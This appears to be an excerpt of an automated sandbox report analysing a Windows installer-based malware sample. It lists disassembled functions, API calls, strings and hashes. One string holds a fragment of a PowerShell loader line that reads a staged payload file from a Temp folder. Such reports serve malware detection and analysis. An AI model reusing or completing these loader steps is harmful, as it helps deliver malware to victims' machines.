                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                                                        • GlobalFree.KERNEL32(?), ref: 00405098
                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00405237
                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                                                                        • ShowWindow.USER32(00000000), ref: 00405249
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                        • String ID: $M$N
                                                                                                        • API String ID: 1638840714-813528018
                                                                                                        • Opcode ID: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                        • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                                                                        • Opcode Fuzzy Hash: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
                                                                                                        • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                                                                        Function 004046EC Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 275stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                                                                        • lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
                                                                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                                                                          • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                          • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                          • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                        • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                                                                          • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                          • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                                                                          • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$: Completed$A$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$dL$6B
                                                                                                        • API String ID: 2624150263-1207239112
                                                                                                        • Opcode ID: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                        • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                                                                        • Opcode Fuzzy Hash: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
                                                                                                        • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                                                                        Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteFileW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 004059BF
                                                                                                        • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A07
                                                                                                        • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A2A
                                                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A30
                                                                                                        • FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405A40
                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405AEF
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\Cpfkf79Rzk.exe", xrefs: 00405996
                                                                                                        • \*.*, xrefs: 00405A01
                                                                                                        • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                                                        • API String ID: 2035342205-2239678096
                                                                                                        • Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                        • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                                                                                        • Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
                                                                                                        • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                                        Function 004043BA Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 204windowstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040446C
                                                                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
                                                                                                        • GetSysColor.USER32(?), ref: 0040449A
                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
                                                                                                        • lstrlenW.KERNEL32(?), ref: 004044BB
                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404536
                                                                                                        • SendMessageW.USER32(00000000), ref: 0040453D
                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404568
                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
                                                                                                        • SetCursor.USER32(00000000), ref: 004045BC
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
                                                                                                        • SetCursor.USER32(00000000), ref: 004045D8
                                                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                        • String ID: 1C@$: Completed$N$dL
                                                                                                        • API String ID: 3103080414-3936683301
                                                                                                        • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                        • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                        • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                        • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                        • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                        • String ID: F
                                                                                                        • API String ID: 941294808-1304234792
                                                                                                        • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                        • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                        • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                        • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                        Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                        • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                          • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                          • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                        • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                        • wsprintfA.USER32 ref: 00405F4F
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                        • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                          • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                          • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                        • String ID: %ls=%ls$[Rename]
                                                                                                        • API String ID: 2171350718-461813615
                                                                                                        • Opcode ID: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                        • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                        • Opcode Fuzzy Hash: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                        • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                        Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                        • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                        • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$Prev
                                                                                                        • String ID: "C:\Users\user\Desktop\Cpfkf79Rzk.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                        • API String ID: 589700163-2587863014
                                                                                                        • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                        • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                        • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                        • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                        Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                        • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                        • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                        • GetSysColor.USER32(?), ref: 004042E8
                                                                                                        • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                        • DeleteObject.GDI32(?), ref: 00404312
                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2320649405-0
                                                                                                        • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                        • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                        • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                        • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                        Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
